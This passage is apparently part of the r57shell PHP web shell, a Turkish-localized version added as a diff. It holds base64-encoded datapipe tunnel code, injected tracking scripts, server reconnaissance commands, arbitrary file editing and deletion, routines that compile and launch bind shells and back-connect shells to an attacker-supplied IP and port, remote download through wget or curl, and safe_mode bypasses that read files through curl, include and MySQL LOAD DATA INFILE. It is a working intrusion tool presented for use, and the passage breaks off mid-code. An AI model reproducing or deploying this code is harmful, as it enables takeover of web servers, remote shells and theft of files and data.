+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("Guvenlik: <b><font color=green>Acik</font></b>"):("Guvenlik: <b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>Acik</font></b>"):("<b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>Acik</font></b>"; } else { echo "<font color=red>Kapali</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo "<br>".ws(2);
+echo "Basarisiz Fonfsiyonlar : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>YOK</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."Harddisk Kullanilmayan : <b>".view_size($free)."</b> Harddisk Toplam  : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=Blue><b>Isletim Sistemi'.ws(1).'<br>Server :'.ws(1).'<br>Kullanici:'.ws(1).'<br>dizin :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'test4':
